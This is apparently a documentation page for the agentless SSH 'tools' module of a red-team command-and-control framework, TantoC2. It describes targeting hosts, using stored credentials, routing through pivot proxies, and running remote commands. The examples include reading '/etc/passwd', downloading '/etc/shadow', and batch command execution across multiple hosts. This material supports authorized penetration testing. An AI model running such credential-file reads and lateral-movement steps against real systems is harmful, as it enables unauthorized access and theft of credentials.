Tools (Agentless Operations)

Tools modules execute operations directly over network protocols — no implant required. Useful when you have credentials and direct network access, or for low-noise initial access and lateral movement.

Overview
#

A tool (agentless module) runs on the teamserver and connects directly to remote services on your behalf. Tools integrate with the credential store for authentication and the proxy configuration for routing.

Unlike agents, tools do not persist on targets. Each operation is a discrete connection — connect, execute, disconnect.

Tools modules are plugins — none are included by default. Install the modules you need before use. Example: the SSH tool is in tools/ssh/.

Installing Tool Modules
#

Tool modules are Python packages installed as TantoC2 plugins.

1
2
# From the workspace root — install the SSH tool
pip install -e tools/ssh/

After installing, register with the running teamserver:

1
2
tantoc2[eng]> tools refresh
Tools refresh complete. 1 new module(s).

Web UI: Plugins page > “Refresh Modules”.

Listing Available Tools
#

1
tantoc2[eng]> tools list

Output shows module name, protocol, description, and available operations.

1
2
Name            Protocol  Description                 Operations
ssh_command     ssh       SSH command execution       exec, upload, download, shell

Web UI: Tools page — module picker dropdown.

Tools Shell (CLI)
#

The recommended way to run multiple operations against the same targets is the tools shell:

1
2
tantoc2[eng]> tools use ssh_command
ssh_command>

Setting Up Session State
#

1
2
3
ssh_command> set target 10.0.0.10
ssh_command> set port 22
ssh_command> set cred <credential-id>

Multiple targets:

1
ssh_command> set targets 10.0.0.10 10.0.0.11 10.0.0.12

Operations run in parallel across all targets. Results are aggregated per target.

Optional proxy:

1
ssh_command> set proxy <proxy-id>

Checking Session State
#

1
2
3
4
5
6
7
8
9
ssh_command> info
Module: ssh_command
Protocol: ssh
Targets: 10.0.0.10:22, 10.0.0.11:22
Credential: <id> (plaintext — alice)
Proxy: corp-socks5

ssh_command> operations
Available operations: exec, upload, download, shell

SSH Operations
#

Execute a Command
#

1
2
ssh_command> exec whoami
ssh_command> exec "id && cat /etc/passwd"

For exec, everything after exec is treated as the command string — no quoting needed for single-word commands.

Background mode:

1
2
ssh_command> exec find / -name "*.conf" -type f &
[bg:1] exec (execution a1b2c3d4...)

Multi-task:

1
ssh_command> exec whoami ;; exec hostname ;; exec id

Upload a File
#

1
ssh_command> upload /local/tool.sh /remote/tmp/tool.sh

Download a File
#

1
ssh_command> download /etc/shadow

Downloaded files land on the teamserver. Retrieve them via files fetch if needed.

Interactive Shell
#

1
ssh_command> shell

Opens an interactive SSH session using xterm.js (web UI) or a streamed terminal session (CLI). Type normally. Exit with exit or logout.

Interactive shell sessions are stateful and require WebSocket-based streaming. In the CLI, shell streams output to your terminal. In the web UI, a terminal panel opens in the Tools page. The back command does not work inside an interactive session — use the session’s own exit mechanism.

Credential Integration
#

Use credentials stored in the credential store directly — no need to pass secrets on the command line.

Find the credential ID:

1
tantoc2[eng]> creds search --username alice --domain CORP

Set it in the tools shell:

1
ssh_command> set cred <credential-id>

The teamserver decrypts the credential and passes it to the tool. The decrypted secret never appears in logs.

Supported credential types for SSH:

Type	Used As
`plaintext`	SSH password authentication
`ssh_key`	SSH public key authentication (private key as secret)

Proxy Configuration
#

Route tool operations through a SOCKS5 or HTTP proxy — useful when the teamserver cannot directly reach the target but a pivot machine can.

Create a Proxy
#

1
2
3
4
5
6
tantoc2[eng]> proxy create \
    --name corp-proxy \
    --type socks5 \
    --host 10.0.0.5 \
    --port 1080 \
    --username proxyuser    # optional

Web UI: Tools page > “Add Proxy”.

Assign to a Tools Session
#

1
ssh_command> set proxy <proxy-id>

All operations in this session route through the proxy.

Managing Proxies
#

1
2
3
tantoc2[eng]> proxy list
tantoc2[eng]> proxy info <id>
tantoc2[eng]> proxy delete <id>

Viewing Execution History
#

After each operation, the result is stored as an execution record.

From inside the tools shell:

1
2
3
4
ssh_command> history
ssh_command> history 20        # last 20
ssh_command> results 3         # show result for background task #3
ssh_command> tasks             # list background tasks

Web UI: Tools page > execution history table with expandable rows showing per-target results.

Multi-Target Operations
#

When multiple targets are set, operations run in parallel and results are returned per-target:

1
2
ssh_command> set targets 10.0.0.10 10.0.0.11 10.0.0.12
ssh_command> exec hostname

Results show:

1
2
3
10.0.0.10:22  ->  webserver-01
10.0.0.11:22  ->  webserver-02
10.0.0.12:22  ->  webserver-03

Multi-target is useful for batch operations across a server farm or for initial enumeration when you have a list of in-scope targets.

Task Execution Model
#

The tools shell uses the same execution model as the agent shell:

Mode	Syntax	Behaviour
Blocking	`exec whoami`	Submits and waits for result (up to 120s timeout)
Background	`exec whoami &`	Submits and returns to prompt immediately
Multi-task	`cmd1 ;; cmd2`	Submits all, waits for all results
Ctrl+C	During blocking wait	Backgrounds the current task

Quick Reference
#

Task	Command
List tools	`tools list`
Module info	`tools info <name>`
Enter tools shell	`tools use <name>`
Refresh modules	`tools refresh`
Set target	`set target <host>`
Set multiple targets	`set targets <h1> <h2> ...`
Set port	`set port <N>`
Set credential	`set cred <id>`
Set proxy	`set proxy <id>`
Run exec	`exec <command>`
Upload	`upload <local> <remote>`
Download	`download <remote>`
Interactive session	`shell`
List operations	`operations`
List bg tasks	`tasks`
Get bg result	`results <N>`
Return to global	`back`

Related Pages
#

Credential Management — credential types and how to add them
Engagement Workflow — where tools fit in an operation
Building Tools Modules — developer reference for writing new tool plugins

Overview#

Installing Tool Modules#

Listing Available Tools#

Tools Shell (CLI)#

Setting Up Session State#

Checking Session State#

SSH Operations#

Execute a Command#

Upload a File#

Download a File#

Interactive Shell#

Credential Integration#

Proxy Configuration#

Create a Proxy#

Assign to a Tools Session#

Managing Proxies#

Viewing Execution History#

Multi-Target Operations#

Task Execution Model#

Quick Reference#

Related Pages#